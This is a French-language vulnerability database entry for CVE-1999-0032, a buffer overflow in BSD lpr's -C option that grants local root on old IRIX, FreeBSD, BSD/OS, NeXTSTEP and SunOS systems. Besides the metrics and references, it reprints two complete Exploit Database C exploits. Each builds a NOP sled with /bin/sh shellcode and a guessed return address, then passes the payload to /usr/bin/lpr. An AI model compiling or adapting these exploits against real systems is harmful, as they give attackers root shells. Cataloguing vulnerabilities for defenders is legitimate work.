CVE-1999-0032 : Détail

CVE-1999-0032

0.22%V4
Local
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in lpr, as used in BSD-based systems including Linux, allows local users to execute arbitrary code as root via a long -C (classification) command line option.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 19545

Date de publication : 1996-10-24 22h00 +00:00
Auteur : Vadim Kolontsov
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/707/info Due to insufficient bounds checking on arguments (in this case -C) which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. These commands will be run with the privileges of the lpr program. When lpr is installed setuid or setgid, it may allow intruders to gain those privileges. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); }
Exploit Database EDB-ID : 19544

Date de publication : 1996-10-24 22h00 +00:00
Auteur : Vadim Kolontsov
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/707/info BSD/OS 2.1,FreeBSD 2.1.5,NeXTstep 4.0/4.1,SGI IRIX 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun Vulnerability (1) Due to insufficient bounds checking on arguments (in this case -C) which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. These commands will be run with the privileges of the lpr program. When lpr is installed setuid or setgid, it may allow intruders to gain those privileges. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); }

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 5.0

    Sgi>>Irix >> Version 5.0.1

    Sgi>>Irix >> Version 5.1

    Sgi>>Irix >> Version 5.1.1

    Sgi>>Irix >> Version 5.2

    Sgi>>Irix >> Version 5.3

    Sgi>>Irix >> Version 6.0

    Sgi>>Irix >> Version 6.0.1

    Sgi>>Irix >> Version 6.1

    Sgi>>Irix >> Version 6.2

    Sgi>>Irix >> Version 6.3

    Sgi>>Irix >> Version 6.4

    Configuraton 0

    Bsdi>>Bsd_os >> Version 2.1

    Freebsd>>Freebsd >> Version 2.0

    Freebsd>>Freebsd >> Version 2.0.5

    Freebsd>>Freebsd >> Version 2.1.0

    Freebsd>>Freebsd >> Version 2.1.5

    Next>>Nextstep >> Version 4.0

      Next>>Nextstep >> Version 4.1

        Sun>>Sunos >> Version 4.1.3u1

        Sun>>Sunos >> Version 4.1.4

        Références

        http://www.securityfocus.com/bid/707
        Tags : vdb-entry, x_refsource_BID
        http://www.ciac.org/ciac/bulletins/i-042.shtml
        Tags : third-party-advisory, government-resource, x_refsource_CIAC